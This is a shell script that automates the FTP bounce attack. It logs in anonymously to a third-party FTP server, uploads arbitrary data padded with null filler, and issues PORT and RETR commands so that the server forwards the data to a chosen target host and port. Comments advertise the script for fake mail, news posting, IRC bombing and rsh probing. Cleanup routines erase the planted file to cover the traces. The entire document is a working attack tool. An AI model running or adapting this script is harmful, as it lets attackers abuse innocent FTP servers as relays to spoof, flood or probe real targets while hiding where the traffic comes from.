#! /bin/sh # Whang stdin thru an FTP site to a target. Implements the Bounce Attack # for fakemail, newsposting, irc-bombing, rsh-poking, or anything else # involving transfer of data *to* the target host. # REQUIRES:: # stdin: contents; temporarily assembled in /tmp/.i # /tmp/filler: 256 lines of 250 nulls each; about 64k worth # ARGS:: # target site: name or IP [hopefully nslookup will deal] # target port: numeric; this handles generating hibyte,lobyte # bounce site: ideally, non-WU with writeable dirs and no identd??? # bounce file: *full path* of w-file over there; this DTRTs with the name # option: # blank -> create, bounce, reconnect and delete # c -> create it, bounce it, but don't delete just yet # y -> it's already there, just re-bounce it and don't delete # d -> dont transfer anything, just delete [for cleanup] test "$4" = "" && echo "Bad args, read the script" && exit 1 test ! -f /tmp/filler && echo "Cant find /tmp/filler; construct it!" && exit 1 TNAME=/tmp/.i$$ # construct necessaries for PORT commands TPORTH=`echo "0 k $2 256 / p q" | dc` TPORTL=`echo "0 k $2 d 256 / 256 * - p q" | dc` # "host" is pretty common these days; try it... THOST=`host -t a "${1}" | fgrep 'has address '| head -1 | \ sed -e 's/.*[ ]//' -e 's/\./,/g'` # if you can't find "host", this works but loses for multihomed machines. # THOST=`nslookup -query=a "${1}" | tail +3 | grep 'ddress:' | \ # sed -e 's/.*[ ]//' -e 's/\./,/g'` TARGET="${THOST},${TPORTH},${TPORTL}" # split filespec into dir/file FDIR=`echo "${4}" | sed 's/\(.*\)\/.*/\1/'` FFILE=`echo "${4}" | sed 's/.*\///'` # select actions by various preloads. $5 is our action-flag... XARG="${5}" if test "$5" = "" ; then XARG='c' fi # Construct the dirty, ship it over and forward to target. We don't delete # yet because many ftp servers crash when the retr-to-target fails in weird # ways, and we might want to keep the file around for a bit... Take out "ascii" # line if need be if test "$XARG" = "c" ; then echo sending $TNAME to $TARGET via $3 : $FDIR / $FFILE >&2 cat - /tmp/filler > $TNAME ftp -n << EOF open $3 prompt quo "user ftp" quo "pass -root@" cd $FDIR binary put $TNAME $FFILE ascii quo "PORT $TARGET" quo "RETR $FFILE" EOF fi # re-whang handler, called only if xarg is "y" test "$XARG" = "y" && ftp -n << EOF open $3 prompt quo "user ftp" quo "pass -root@" cd $FDIR ascii quo "PORT $TARGET" quo "RETR $FFILE" EOF if test "${5}" = "" ; then XARG='d' fi # delete handler. A bit fancy 'cause some servers disallow delete and/or # rename, and some allow rename even though they thought otherwise, heh heh. # In any case, make damn sure the thing is gonzo. if test "$XARG" = "d" ; then echo "test" > $TNAME ftp -n << EOF open $3 prompt quo "user ftp" quo "pass -root@" cd $FDIR put $TNAME ${FFILE} put $TNAME x${FFILE} quo "rnfr x${FFILE}" quo "rnfr x${FFILE}" quo "rnto $FFILE" quo "rnfr ${FFILE}" quo "rnfr ${FFILE}" quo "rnto x${FFILE}" del x${FFILE} del $FFILE quit EOF fi test -f $TNAME && rm $TNAME sync exit 0